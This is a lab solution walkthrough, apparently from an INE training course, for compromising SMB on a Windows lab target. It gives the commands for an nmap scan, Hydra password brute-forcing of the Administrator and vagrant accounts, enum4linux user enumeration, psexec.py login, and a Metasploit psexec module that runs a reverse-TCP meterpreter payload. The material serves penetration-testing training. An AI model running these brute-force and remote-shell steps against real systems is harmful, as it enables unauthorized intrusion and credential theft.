Solution

Step 1: Open the lab link to access the Kali GUI instance

Step 2: Identify the target IP address

Before we get started, you will need to obtain the IP address of the target system within the lab
environment.

You can obtain the target IP address by viewing the content of the /etc/hosts file on the Kali
Linux system.

This can be done by running the following command:

Command:

cat /etc/hosts

The target system's IP address can be accessed viademo.ine.local. Copy the IP address that
corresponds to that domain.

Note: Your target IP address will be different, so make sure to substitute the IP shown in the
commands below with the one in your lab.

Alternatively, you can also ping demo.ine.local to obtain the IP address of the target system.
This can be done by running the following command:

Command:

ping demo.ine.local

In this case, the target IP address is10.0.31.252.

Step 3: Port scanning with Nmap

In this lab, we will be targeting the SMB port, as a result, we can limit our Nmap scan to port
445.

We can identify vulnerabilities or misconfigurations on the SMB port by performing an Nmap

script scan with the default Nmap script option. This can be done by running the following
command:

Command:

nmap -sV -sC -p 445 10.0.31.252

As shown in the following screenshot, the default Nmap script reveals the specific version of
Windows running on the target in addition to the SMB security mode.
Step 4: SMB brute force

In the previous labs, we were able to identify various user accounts through SSH & FTP brute
force attacks. We can use these user accounts to perform a brute force attack to identify
legitimate SMB credentials that we can use to authenticate with the target system.

So far, we have been able to identify two user accounts: 1. Administrator 2. vagrant

We can limit our brute force attack to these usernames to speed up and reduce the time
required to perform the brute force attack.

We can use the Hydra tool to perform an SMB brute-force attack. This can be done by running
the following command:

Command:

hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.0.31.252 smb

As shown in the following screenshot, after a couple of minutes we are able to identify
theAdministratoraccount password, which in this case isvagrant.

We can also perform the brute force attack with the user vagrant to identify the password for
the user account by running the following command:

Command:

hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.0.31.252 smb

So far, we have been able to identify legitimate passwords for both
the Administrator and vagrant user accounts.

Step 5: Enumerating user accounts with enum4linux

Now that we have legitimate SMB credentials, we can use them to enumerate other user
accounts on the Windows target by leveraging an enumeration utility called enum4linux.

This can be done by running the following command:

Command:

enum4linux -u vagrant -p vagrant -U 10.0.31.252

As shown in the following screenshot, we are successfully able to identify other user accounts
on the Windows target. This information is very useful as it can be used to fine tune our brute
force attacks by limiting the brute force to these usernames.

Step 6: SMB authentication with PsExec

Given that we have legitimate user credentials on the Windows target, we can remotely
authenticate with the target system via SMB in order to obtain remote access on the target
system. This can be done through the use of the python implementation of PsExec.
To begin with, you will need to copy the psexec.py script from the python3-impacket directory
to your current working directory. This can be done by running the following command:

Command:

cp /usr/share/doc/python3-impacket/examples/psexec.py /root/Desktop

You will then need to provide the psexec.py with executable permissions, this can be done by
running the following command:

Command:

chmod +x psexec.py

We can now run thepsexec.pywith the usernameAdministrator. This can be done by running
the following command:

Command:

python3 psexec.py [email protected]

As shown in the following screenshot, you will be prompted to provide the password for
theAdministratoruser, which in this case isvagrant.

As shown in the preceding screenshot, after successful authentication, you will be provided
with remote access to the Windows target as the Administrator user.

We can also utilize the exploit/windows/smb/psexec Metasploit module to obtain

a meterpreter session on the target system.

We will first need to start the Metasploit Framework Console (msfconsole), this can be done by
running the following command:

Command:

msfconsole

We can then load the module, by running the following command:

Command:

use exploit/windows/smb/psexec
After loading the module, we will need to configure the module options, in this case, we will
need to set the target IP and the SMB credentials for authentication. This can be done by
running the following commands:

Command:

set RHOSTS 10.0.31.252

Command:

set SMBUser Administrator

Command:

Set SMBPass vagrant

We will also need to change the meterpreter payload, this can be done by running the
following command: Command:

set payload windows/x64/meterpreter/reverse_tcp

After configuring the module options we can execute the module by running the following
command:

Command:

exploit

As shown in the following screenshot, if successful, the module will authenticate with the
Windows target via SMB with the credentials you specified and will execute
ameterpreterpayload on the target system consequently providing you with remote access on
the target system.

Conclusion
In this lab, we explored the process of exploiting the SMB service running on a Windows target
by performing an SMB brute force attack and leveraging PsExec to obtain remote access to the
target system.